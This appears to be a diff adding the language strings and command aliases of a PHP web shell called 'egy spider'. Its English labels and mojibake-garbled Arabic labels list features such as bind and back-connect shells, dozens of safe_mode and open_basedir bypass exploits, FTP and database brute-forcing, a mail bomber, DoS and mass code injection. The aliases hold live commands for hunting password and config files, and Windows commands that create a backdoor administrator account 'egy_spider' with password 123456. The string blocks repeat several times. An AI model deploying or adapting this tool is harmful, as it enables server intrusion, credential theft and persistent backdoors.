+'ar_text225'=>'ÒÑÚ ãáİ áÊáÊÎØì ãä ÎáÇá ŞÇÚÏå ÇáÈíÇäÇÊ á 4.4.7 / 5.2.3 PHP ',
+'ar_text226'=>'ÊÎØì ÇáÓíİ ãæÏ ÈËÛÑå Root Directory: ',
+'ar_text227'=>'ÒÑÚ ãáİ áÊÎØì ÇáÓİ ãæÏ ÈËÛÑå 4.4.2/5.1.2',
+'ar_text228'=>'ÒÑÚ ãáİ áÊÎØì ÇáÍãÇíå áãäÊÏÉ Çáİì Èì  ',
+'ar_text230'=>'ÒÑÚ ãáİ áãÚÑİå ßáãÇÊ ÇáãÑæÑ áãæÇŞÚ ÇáÓíÑİÑ ÈÏæä ÊÔİíÑ ',
+'ar_text151'=>'ÊÎØì ÇáÓíİ ãæÏ È  chdir()and ftok() (PHP <= 5.2.6)',
+'ar_text161'=>'ÊÎØì ÇáÓíİ ãæÏ È  posix_access() (posix ext) (PHP <= 5.2.6)',
+'ar_text147'=>'',
+'ar_text148'=>'',
+'ar_text149'=>'',
+'ar_text150'=>'',
+'ar_text159'=>'ãÚáæãÇÊ Úä egy spider',
+'ar_text152'=>'ÇÎÑ ÇáÇÎÈÇÑ',
+'ar_text153'=>'ÎÑæÌ ',
+'ar_text154'=>'æÖÚ ÇäÏßÓ ÓÑíÚå ',
+'ar_text155'=>'ÍŞä ÇßæÇÏ ',
+'ar_text156'=>'ÚÑÖ ÇáßæÏ ',
+'ar_text157'=>'ÇáÊÓÌíá İì ÇáÒæä ÇÊÔ ',
+'ar_text158'=>'ÇÏæÇÊ ÇáÊÔİíÑ  ',
+'ar_text160'=>'ÇáÑÆÓíå  ',
+'ar_text162'=>'ÇŞİÇá ÇáÏæÇá  æÊÎØì ÇáÓíİ ãæÏ ãä ÎáÇá ionCube (PHP <= 5.2.4)',
+'ar_text163'=>'ÊÔÛíá ÇáÈíÑá Úáì ÇáÓíÑİÑ ',
+'ar_text170'=>' ÊÎØì ÇáÓíİ ãæÏ æÇáÏæÇá È  Posix_getpw(PHP <= 4.2.0)',
+'ar_text171'=>' PHP (Win32std) Extension ÊÎØì ÇáÓíİ ãæÏ æÊÎØì ÇáÏæÇá (PHP <= 5.2.3)',
+'ar_text180'=>'ÇÑÓá ãáÇÍÙÇÊß æÇÊÕá Èì ',
+/* --------------------------------------------------------------- */
+'eng_butt1' =>'Execute',
+'eng_butt2' =>'Upload',
+'eng_butt3' =>'Bind',
+'eng_butt4' =>'Connect',
+'eng_butt5' =>'Run',
+'eng_butt6' =>'Change',
+'eng_butt7' =>'Show',
+'eng_butt8' =>'Test',
+'eng_butt9' =>'Dump',
+'eng_butt10'=>'Save',
+'eng_butt11'=>'Edit file',
+'eng_butt12'=>'Find',
+'eng_butt13'=>'Create/Delete',
+'eng_butt14'=>'Download',
+'eng_butt15'=>'Send',
+'eng_text1' =>'Executed command',
+'eng_text2' =>'Execute command on server',
+'eng_text3' =>'Run command',
+'eng_text4' =>'Work directory',
+'eng_text5' =>'Upload files on server',
+'eng_text6' =>'Local file',
+'eng_text7' =>'Aliases',
+'eng_text8' =>'Select alias',
+'eng_text9' =>'Bind port to /bin/bash',
+'eng_text10'=>'Port',
+'eng_text11'=>'Password for access',
+'eng_text12'=>'back-connect',
+'eng_text13'=>'IP',
+'eng_text14'=>'Port',
+'eng_text15'=>'Upload files from remote server',
+'eng_text16'=>'With',
+'eng_text17'=>'Remote file',
+'eng_text18'=>'Local file',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'Use',
+'eng_text21'=>'&nbsp;New name',
+'eng_text22'=>'datapipe',
+'eng_text23'=>'Local port',
+'eng_text24'=>'Remote host',
+'eng_text25'=>'Remote port',
+'eng_text26'=>'Use',
+'eng_text28'=>'Work in safe_mode',
+'eng_text29'=>'ACCESS DENIED',
+'eng_text30'=>'Cat file',
+'eng_text31'=>'File not found',
+'eng_text32'=>'Eval PHP code',
+'eng_text33'=>'Test bypass open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)',
+'eng_text34'=>'Test bypass safe_mode with include function',
+'eng_text35'=>'Test bypass safe_mode with load file in mysql',
+'eng_text36'=>'Database . Table',
+'eng_text37'=>'Login',
+'eng_text38'=>'Password',
+'eng_text39'=>'Database',
+'eng_text40'=>'Dump database table',
+'eng_text41'=>'Save dump in file',
+'eng_text42'=>'Edit files',
+'eng_text43'=>'File for edit',
+'eng_text44'=>'Can\'t edit file! Only read access!',
+'eng_text45'=>'File saved',
+'eng_text46'=>'Show phpinfo()',
+'eng_text47'=>'Show variables from php.ini',
+'eng_text48'=>'Delete temp files',
+'eng_text49'=>'Delete script from server',
+'eng_text50'=>'View cpu info',
+'eng_text51'=>'View memory info',
+'eng_text52'=>'Find text',
+'eng_text53'=>'In dirs',
+'eng_text54'=>'Find text in files',
+'eng_text55'=>'Only in files',
+'eng_text56'=>'Nothing :(',
+'eng_text57'=>'Create/Delete File/Dir',
+'eng_text58'=>'name',
+'eng_text59'=>'file',
+'eng_text60'=>'dir',
+'eng_text61'=>'File created',
+'eng_text62'=>'Dir created',
+'eng_text63'=>'File deleted',
+'eng_text64'=>'Dir deleted',
+'eng_text65'=>'Create',
+'eng_text66'=>'Delete',
+'eng_text67'=>'Chown/Chgrp/Chmod',
+'eng_text68'=>'Command',
+'eng_text69'=>'param1',
+'eng_text70'=>'param2',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'Text for find',
+'eng_text73'=>'Find in folder',
+'eng_text74'=>'Find in files',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'Search text in files via find',
+'eng_text80'=>'Type',
+'eng_text81'=>'Net',
+'eng_text82'=>'Databases',
+'eng_text83'=>'Run SQL query',
+'eng_text84'=>'SQL query',
+'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
+'eng_text86'=>'Download files from server',
+'eng_text87'=>'Download files from remote ftp-server',
+'eng_text88'=>'server:port',
+'eng_text89'=>'File on ftp',
+'eng_text90'=>'Transfer mode',
+'eng_text91'=>'Archivation',
+'eng_text92'=>'without arch.',
+'eng_text93'=>'FTP',
+'eng_text94'=>'FTP-bruteforce',
+'eng_text95'=>'Users list',
+'eng_text96'=>'Can\'t get users list',
+'eng_text97'=>'checked: ',
+'eng_text98'=>'success: ',
+'eng_text99'=>'/etc/passwd',
+'eng_text100'=>'Send file to remote ftp server',
+'eng_text101'=>'Use reverse (user -> resu)',
+'eng_text102'=>'Mail',
+'eng_text103'=>'Send email',
+'eng_text104'=>'Send file to email',
+'eng_text105'=>'To',
+'eng_text106'=>'From',
+'eng_text107'=>'Subj',
+'eng_text108'=>'Mail',
+'eng_text109'=>'Hide',
+'eng_text110'=>'Show',
+'eng_text111'=>'SQL-Server : Port',
+'eng_text112'=>'Test bypass safe_mode with function mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)',
+'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list() (PHP <= 5.1.2)',
+'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body() (PHP <= 5.1.2)',
+'eng_text115'=>'Test bypass safe_mode, copy file via copy(compress.zlib://) (PHP <= 4.4.2, 5.1.2)',
+'eng_text116'=>'Copy from',
+'eng_text117'=>'to',
+'eng_text118'=>'File copied',
+'eng_text119'=>'Cant copy file',
+'eng_text120'=>'Test bypass safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST',
+'eng_text121'=>'Test bypass open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST',
+'eng_text122'=>'Test bypass open_basedir, view dir list via glob() (PHP <= 5.2.x)',
+'eng_text123'=>'Test bypass open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)',
+'eng_text124'=>'Test bypass open_basedir, add data to file via error_log(php://) (PHP <= 5.1.4, 4.4.2)',
+'eng_text125'=>'Data',
+'eng_text126'=>'Test bypass open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)',
+'eng_text127'=>'Test bypass open_basedir, add data to file via readfile(php://) (PHP <= 5.2.1, 4.4.4)',
+'eng_text128'=>'Modify/Access file (touch)',
+'eng_text129'=>'Test bypass open_basedir, create file via fopen(srpath://) (PHP v5.2.0)',
+'eng_text130'=>'Test bypass open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)',
+'eng_text131'=>'Test bypass open_basedir, view file contest via symlink() (PHP <= 5.2.1)',
+'eng_'=>'Test bypass open_basedir, view dir list via symlink() (PHP <= 5.2.1)',
+'eng_text133'=>'Test bypass open_basedir, create file via session_save_path(TMPDIR) (PHP <= 5.2.4)',
+'eng_text134'=>'Database-bruteforce',
+'eng_text135'=>'Dictionary',
+'eng_text136'=>'Creating evil symlink',
+'eng_text137'=>'Useful',
+'eng_text138'=>'Dangerous',
+'eng_text139'=>'Mail Bomber',
+'eng_text140'=>'DoS',
+'eng_text141'=>'Danger! Web-daemon crash possible.',
+'eng_text142'=>'Downloaders',
+'eng_text143'=>'Temp: ',
+'eng_text144'=>'Test bypass safe_mode with load file in mysqli',
+'eng_text145'=>'Test bypass open_basedir, view dir list via realpath() (PHP <= 5.2.4)',
+'eng_text146'=>'Max Interation',
+'eng_text147'=>'',
+'eng_text148'=>'',
+'eng_text149'=>'',
+'eng_text150'=>'',
+'eng_err0'=>'Error! Can\'t write in file ',
+'eng_err1'=>'Error! Can\'t read file ',
+'eng_err2'=>'Error! Can\'t create ',
+'eng_err3'=>'Error! Can\'t connect to ftp',
+'eng_err4'=>'Error! Can\'t login on ftp server',
+'eng_err5'=>'Error! Can\'t change dir on ftp',
+'eng_err6'=>'Error! Can\'t sent mail',
+'eng_err7'=>'Mail send',
+'eng_text1' =>'Executed command',
+'eng_text2' =>'Execute command on server',
+'eng_text3' =>'Run command',
+'eng_text4' =>'Work directory',
+'eng_text5' =>'Upload files on server',
+'eng_text6' =>'Local file',
+'eng_text7' =>'Aliases',
+'eng_text8' =>'Select alias',
+'eng_butt1' =>'Execute',
+'eng_butt2' =>'Upload',
+'eng_text9' =>'Bind port to /bin/bash',
+'eng_text10'=>'Port',
+'eng_text11'=>'Password for access',
+'eng_butt3' =>'Bind',
+'eng_text12'=>'back-connect',
+'eng_text13'=>'IP',
+'eng_text14'=>'Port',
+'eng_butt4' =>'Connect',
+'eng_text15'=>'Upload files from remote server',
+'eng_text16'=>'With',
+'eng_text17'=>'Remote file',
+'eng_text18'=>'Local file',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'Use',
+'eng_text21'=>'&nbsp;New name',
+'eng_text22'=>'datapipe',
+'eng_text23'=>'Local port',
+'eng_text24'=>'Remote host',
+'eng_text25'=>'Remote port',
+'eng_text26'=>'Use',
+'eng_butt5' =>'Run',
+'eng_text28'=>'Work in safe_mode',
+'eng_text29'=>'ACCESS DENIED',
+'eng_butt6' =>'Change',
+'eng_text30'=>'Cat file',
+'eng_butt7' =>'Show',
+'eng_text31'=>'File not found',
+'eng_text32'=>'Eval PHP code',
+'eng_text33'=>'Test bypass open_basedir with cURL functions',
+'eng_butt8' =>'Test',
+'eng_text34'=>'Test bypass safe_mode with include function',
+'eng_text35'=>'Test bypass safe_mode with load file in mysql',
+'eng_text36'=>'Database . Table',
+'eng_text37'=>'Login',
+'eng_text38'=>'Password',
+'eng_text39'=>'Database',
+'eng_text40'=>'Dump database table',
+'eng_butt9' =>'Dump',
+'eng_text41'=>'Save dump in file',
+'eng_text42'=>'Edit files',
+'eng_text43'=>'File for edit',
+'eng_butt10'=>'Save',
+'eng_text44'=>'Can\'t edit file! Only read access!',
+'eng_text45'=>'File saved',
+'eng_text46'=>'Show phpinfo()',
+'eng_text47'=>'Show variables from php.ini',
+'eng_text48'=>'Delete temp files',
+'eng_butt11'=>'Edit file',
+'eng_text49'=>'Delete script from server',
+'eng_text50'=>'View cpu info',
+'eng_text51'=>'View memory info',
+'eng_text52'=>'Find text',
+'eng_text53'=>'In dirs',
+'eng_text54'=>'Find text in files',
+'eng_butt12'=>'Find',
+'eng_text55'=>'Only in files',
+'eng_text56'=>'Nothing :(',
+'eng_text57'=>'Create/Delete File/Dir',
+'eng_text58'=>'name',
+'eng_text59'=>'file',
+'eng_text60'=>'dir',
+'eng_butt13'=>'Create/Delete',
+'eng_text61'=>'File created',
+'eng_text62'=>'Dir created',
+'eng_text63'=>'File deleted',
+'eng_text64'=>'Dir deleted',
+'eng_butt65'=>'Create',
+'eng_text65'=>'Create',
+'eng_text66'=>'Delete',
+'eng_text67'=>'Chown/Chgrp/Chmod',
+'eng_text68'=>'Command',
+'eng_text69'=>'param1',
+'eng_text70'=>'param2',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'Text for find',
+'eng_text73'=>'Find in folder',
+'eng_text74'=>'Find in files',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'Search text in files via find',
+'eng_text80'=>'Type',
+'eng_text81'=>'Net',
+'eng_text82'=>'Databases',
+'eng_text83'=>'Run SQL query',
+'eng_text84'=>'SQL query',
+'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
+'eng_text86'=>'Download files from server',
+'eng_butt14'=>'Download',
+'eng_text87'=>'Download files from remote ftp-server',
+'eng_text88'=>'FTP-server:port',
+'eng_text89'=>'File on ftp',
+'eng_text90'=>'Transfer mode',
+'eng_text91'=>'Archivation',
+'eng_text92'=>'without archivation',
+'eng_text93'=>'FTP',
+'eng_text94'=>'FTP-bruteforce',
+'eng_text95'=>'Users list',
+'eng_text96'=>'Can\'t get users list',
+'eng_text97'=>'checked: ',
+'eng_text98'=>'success: ',
+'eng_text99'=>'* use username from /etc/passwd for ftp login and password',
+'eng_text100'=>'Send file to remote ftp server',
+'eng_text101'=>'Use reverse (user -> resu) login for password',
+'eng_text102'=>'Mail',
+'eng_text103'=>'Send email',
+'eng_text104'=>'Send file to email',
+'eng_text105'=>'To',
+'eng_text106'=>'From',
+'eng_text107'=>'Subj',
+'eng_butt15'=>'Send',
+'eng_text108'=>'Mail',
+'eng_text109'=>'Hide',
+'eng_text110'=>'Show',
+'eng_text111'=>'SQL-Server : Port',
+'eng_text112'=>'Test bypass safe_mode with function mb_send_mail',
+'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list',
+'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body',
+'eng_text115'=>'Test bypass safe_mode, copy file via compress.zlib:// in function copy()',
+'eng_text116'=>'Copy from',
+'eng_text117'=>'to',
+'eng_text118'=>'File copied',
+'eng_text119'=>'Cant copy file',
+'eng_err0'=>'Error! Can\'t write in file ',
+'eng_err1'=>'Error! Can\'t read file ',
+'eng_err2'=>'Error! Can\'t create ',
+'eng_err3'=>'Error! Can\'t connect to ftp',
+'eng_err4'=>'Error! Can\'t login on ftp server',
+'eng_err5'=>'Error! Can\'t change dir on ftp',
+'eng_err6'=>'Error! Can\'t sent mail',
+'eng_err7'=>'Mail send',
+'eng_text200'=>'read file from vul copy()',
+'eng_text500'=>'read file from id()',
+'eng_text555'=>'read file from imap()',
+'eng_text202'=>'where file in server',
+'eng_text300'=>'read file from vul curl()',
+'eng_text203'=>'read file from vul ini_restore()',
+'eng_text204'=>'write shell from vul error_log()',
+'eng_text205'=>'write shell in this side',
+'eng_text206'=>'read dir',
+'eng_text207'=>'read dir from vul reg_glob',
+'eng_text208'=>'execute with function',
+'eng_text209'=>'read dir from vul root',
+'eng_text210'=>'DeZender ',
+'eng_text211'=>'::safe_mode off::',
+'eng_text212'=>'colse safe_mode with php.ini',
+'eng_text213'=>'colse security_mod with .htaccess',
+'eng_text214'=>'Admin name',
+'eng_text215'=>'IRC server ',
+'eng_text216'=>'#room name',
+'eng_text217'=>'server',
+'eng_text218'=>'write ini.php file to close safe_mode with ini_restore vul',
+'eng_text225'=>'MySQL Safe Mode Bypass 4.4.7 / 5.2.3 PHP ',
+'eng_text226'=>'Safe Mode Bpass Root Directory: ',
+'eng_text227'=>'Safe_Mode Bypass 4.4.2/5.1.2: ',
+'eng_text228'=>'tools for hacker vb ',
+'eng_text230'=>'know pass of cpanel ',
+'eng_text219'=>'Get file to server in safe_mode and change name',
+'eng_text220'=>'show file with symlink vul',
+'eng_text221'=>'zip file in server to download',
+'eng_text222'=>'2 symlink use vul',
+'eng_text223'=>'read file from funcution',
+'eng_text224'=>'read file from PLUGIN ',
+'eng_butt1' =>'Execute',
+'eng_butt2' =>'Upload',
+'eng_butt3' =>'Bind',
+'eng_butt4' =>'Connect',
+'eng_butt5' =>'Run',
+'eng_butt6' =>'Change',
+'eng_butt7' =>'Show',
+'eng_butt8' =>'Test',
+'eng_butt9' =>'Dump',
+'eng_butt10'=>'Save',
+'eng_butt11'=>'Edit file',
+'eng_butt12'=>'Find',
+'eng_butt13'=>'Create/Delete',
+'eng_butt14'=>'Download',
+'eng_butt15'=>'Send',
+'eng_text1' =>'Executed command',
+'eng_text2' =>'Execute command on server',
+'eng_text3' =>'Run command',
+'eng_text4' =>'Work directory',
+'eng_text5' =>'Upload files on server',
+'eng_text6' =>'Local file',
+'eng_text7' =>'Aliases',
+'eng_text8' =>'Select alias',
+'eng_text9' =>'Bind port to /bin/bash',
+'eng_text10'=>'Port',
+'eng_text11'=>'Password for access',
+'eng_text12'=>'back-connect',
+'eng_text13'=>'IP',
+'eng_text14'=>'Port',
+'eng_text15'=>'Upload files from remote server',
+'eng_text16'=>'With',
+'eng_text17'=>'Remote file',
+'eng_text18'=>'Local file',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'Use',
+'eng_text21'=>'&nbsp;New name',
+'eng_text22'=>'datapipe',
+'eng_text23'=>'Local port',
+'eng_text24'=>'Remote host',
+'eng_text25'=>'Remote port',
+'eng_text26'=>'Use',
+'eng_text28'=>'Work in safe_mode',
+'eng_text29'=>'ACCESS DENIED',
+'eng_text30'=>'Cat file',
+'eng_text31'=>'File not found',
+'eng_text32'=>'Eval PHP code',
+'eng_text33'=>'Test bypass open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)',
+'eng_text34'=>'Test bypass safe_mode with include function',
+'eng_text35'=>'Test bypass safe_mode with load file in mysql',
+'eng_text36'=>'Database . Table',
+'eng_text37'=>'Login',
+'eng_text38'=>'Password',
+'eng_text39'=>'Database',
+'eng_text40'=>'Dump database table',
+'eng_text41'=>'Save dump in file',
+'eng_text42'=>'Edit files',
+'eng_text43'=>'File for edit',
+'eng_text44'=>'Can\'t edit file! Only read access!',
+'eng_text45'=>'File saved',
+'eng_text46'=>'Show phpinfo()',
+'eng_text47'=>'Show variables from php.ini',
+'eng_text48'=>'Delete temp files',
+'eng_text49'=>'Delete script from server',
+'eng_text50'=>'View cpu info',
+'eng_text51'=>'View memory info',
+'eng_text52'=>'Find text',
+'eng_text53'=>'In dirs',
+'eng_text54'=>'Find text in files',
+'eng_text55'=>'Only in files',
+'eng_text56'=>'Nothing :(',
+'eng_text57'=>'Create/Delete File/Dir',
+'eng_text58'=>'name',
+'eng_text59'=>'file',
+'eng_text60'=>'dir',
+'eng_text61'=>'File created',
+'eng_text62'=>'Dir created',
+'eng_text63'=>'File deleted',
+'eng_text64'=>'Dir deleted',
+'eng_text65'=>'Create',
+'eng_text66'=>'Delete',
+'eng_text67'=>'Chown/Chgrp/Chmod',
+'eng_text68'=>'Command',
+'eng_text69'=>'param1',
+'eng_text70'=>'param2',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'Text for find',
+'eng_text73'=>'Find in folder',
+'eng_text74'=>'Find in files',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'Search text in files via find',
+'eng_text80'=>'Type',
+'eng_text81'=>'Net',
+'eng_text82'=>'Databases',
+'eng_text83'=>'Run SQL query',
+'eng_text84'=>'SQL query',
+'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
+'eng_text86'=>'Download files from server',
+'eng_text87'=>'Download files from remote ftp-server',
+'eng_text88'=>'server:port',
+'eng_text89'=>'File on ftp',
+'eng_text90'=>'Transfer mode',
+'eng_text91'=>'Archivation',
+'eng_text92'=>'without arch.',
+'eng_text93'=>'FTP',
+'eng_text94'=>'FTP-bruteforce',
+'eng_text95'=>'Users list',
+'eng_text96'=>'Can\'t get users list',
+'eng_text97'=>'checked: ',
+'eng_text98'=>'success: ',
+'eng_text99'=>'/etc/passwd',
+'eng_text100'=>'Send file to remote ftp server',
+'eng_text101'=>'Use reverse (user -> resu)',
+'eng_text102'=>'Mail',
+'eng_text103'=>'Send email',
+'eng_text104'=>'Send file to email',
+'eng_text105'=>'To',
+'eng_text106'=>'From',
+'eng_text107'=>'Subj',
+'eng_text108'=>'Mail',
+'eng_text109'=>'Hide',
+'eng_text110'=>'Show',
+'eng_text111'=>'SQL-Server : Port',
+'eng_text112'=>'Test bypass safe_mode with function mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)',
+'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list() (PHP <= 5.1.2)',
+'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body() (PHP <= 5.1.2)',
+'eng_text115'=>'Test bypass safe_mode, copy file via copy(compress.zlib://) (PHP <= 4.4.2, 5.1.2)',
+'eng_text116'=>'Copy from',
+'eng_text117'=>'to',
+'eng_text118'=>'File copied',
+'eng_text119'=>'Cant copy file',
+'eng_text120'=>'Test bypass safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST',
+'eng_text121'=>'Test bypass open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST',
+'eng_text122'=>'Test bypass open_basedir, view dir list via glob() (PHP <= 5.2.x)',
+'eng_text123'=>'Test bypass open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)',
+'eng_text124'=>'Test bypass open_basedir, add data to file via error_log(php://) (PHP <= 5.1.4, 4.4.2)',
+'eng_text125'=>'Data',
+'eng_text126'=>'Test bypass open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)',
+'eng_text127'=>'Test bypass open_basedir, add data to file via readfile(php://) (PHP <= 5.2.1, 4.4.4)',
+'eng_text128'=>'Modify/Access file (touch)',
+'eng_text129'=>'Test bypass open_basedir, create file via fopen(srpath://) (PHP v5.2.0)',
+'eng_text130'=>'Test bypass open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)',
+'eng_text131'=>'Test bypass open_basedir, view file contest via symlink() (PHP <= 5.2.1)',
+'eng_text132'=>'Test bypass open_basedir, view dir list via symlink() (PHP <= 5.2.1)',
+'eng_text133'=>'Test bypass open_basedir, create file via session_save_path(TMPDIR) (PHP <= 5.2.4)',
+'eng_text134'=>'Database-bruteforce',
+'eng_text135'=>'Dictionary',
+'eng_text136'=>'Creating evil symlink',
+'eng_text137'=>'Useful',
+'eng_text138'=>'Dangerous',
+'eng_text139'=>'Mail Bomber',
+'eng_text140'=>'DoS',
+'eng_text141'=>'Danger! Web-daemon crash possible.',
+'eng_text142'=>'Downloaders',
+'eng_text143'=>'Temp: ',
+'eng_text144'=>'Test bypass safe_mode with load file in mysqli',
+'eng_text145'=>'Test bypass open_basedir, view dir list via realpath() (PHP <= 5.2.4)',
+'eng_text146'=>'Max Interation',
+'eng_text151'=>'Test bypass safe_mode with chdir()and ftok() (PHP <= 5.2.6)',
+'eng_text161'=>'Test bypass safe_mode with posix_access() (posix ext) (PHP <= 5.2.6)',
+'eng_text162'=>'ionCube extension safe_mode and disable_functions protections bypass (PHP <= 5.2.4)',
+'eng_text163'=>'PHP Perl Extension Safe_mode Bypass Exploit',
+'eng_text170'=>' Test bypass safe_mode and Open_basedir Settings by Posix_getpw (PHP <= 4.2.0)',
+'eng_text171'=>' PHP (Win32std) Extension safe_mode/disable_functions Protections Bypass (PHP <= 5.2.3)',
+'eng_text147'=>'',
+'eng_text148'=>'',
+'eng_text149'=>'',
+'eng_text150'=>'',
+'eng_text159'=>'About egy spider',
+'eng_text152'=>'Latest News',
+'eng_text153'=>'Logout ',
+'eng_text154'=>'Quick index ',
+'eng_text155'=>'Mass Code Injection ',
+'eng_text156'=>'File source ',
+'eng_text157'=>'Registration in Zone-h ',
+'eng_text158'=>'Hash Tools  ',
+'eng_text160'=>'Home Shell  ',
+'eng_text180'=>'Send Your Comments And Contacted Me ',
+'eng_err0'=>'Error! Can\'t write in file ',
+'eng_err1'=>'Error! Can\'t read file ',
+'eng_err2'=>'Error! Can\'t create ',
+'eng_err3'=>'Error! Can\'t connect to ftp',
+'eng_err4'=>'Error! Can\'t login on ftp server',
+'eng_err5'=>'Error! Can\'t change dir on ftp',
+'eng_err6'=>'Error! Can\'t sent mail',
+'eng_err7'=>'Mail send',
+
+
+);
+/*
+?????? ??????
+????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? )
+?? ?????? ???? ????????? ??? ???????? ???????.
+*/
+$aliases=array(
+'----------------------------------locate'=>'',
+'find httpd.conf files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate httpd.conf files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate vhosts.conf files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate proftpd.conf files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate psybnc.conf'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate my.conf files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate admin.php files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate cfg.php files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate conf.php files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate config.dat files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate config.php files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate config.inc files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate config.inc.php files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate config.default.php files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate .conf files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate .pwd files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate .sql files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate .htpasswd files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate .bash_history files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate .mysql_history files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate backup files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate dump files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate priv files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate vhosts.conf files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'________________find orders ______________-'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'cat /var/cpanel/accounting.log'=>'cat /var/cpanel/accounting.log',
+'find all site of server and user'=>'ls -la /etc/valiases',
+'find suid files'=>'find / -type f -perm -04000 -ls',
+'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
+'find sgid files'=>'find / -type f -perm -02000 -ls',
+'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
+'find config.inc.php files'=>'find / -type f -name config.inc.php',
+'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
+'find config* files'=>'find / -type f -name "config*"',
+'find config* files in current dir'=>'find . -type f -name "config*"',
+'find all writable files'=>'find / -type f -perm -2 -ls',
+'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
+'find all writable directories'=>'find /  -type d -perm -2 -ls',
+'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
+'find all writable directories and files'=>'find / -perm -2 -ls',
+'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
+'find all service.pwd files'=>'find / -type f -name service.pwd',
+'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
+'find all .htpasswd files'=>'find / -type f -name .htpasswd',
+'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
+'find all .bash_history files'=>'find / -type f -name .bash_history',
+'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
+'find all .mysql_history files'=>'find / -type f -name .mysql_history',
+'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
+'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
+'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
+'list file attributes on a Linux second extended file system'=>'lsattr -va',
+'show opened ports'=>'netstat -an | grep -i listen',
+'________________var orders var______________-'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'find /var/ error_log files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'find /var/ access.log files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'find /var/ error.log files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'find /var/ &quot;*.log&quot; files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'________________for server windows ______________-'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'1_learn the management server'=>'net user',
+'2_add new user'=>'net user egy_spider 123456 /add',
+'3_add your user for admin group (this order after add order 1&2'=>'net localgroup administrators egy_spider /add',
+'----------------------------------------------------------------------------------------------------'=>'ls -la'
+);
+$table_up1  = "<tr><td bgcolor=#333333><font face=Verdana size=-2><b><div align=center>:: ";
+$table_up2  = " ::</div></b></font></td></tr><tr><td>";
+$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333>";
+$table_end1 = "</td></tr>";
+$arrow = " <font face=Webdings color=gray>4</font>";
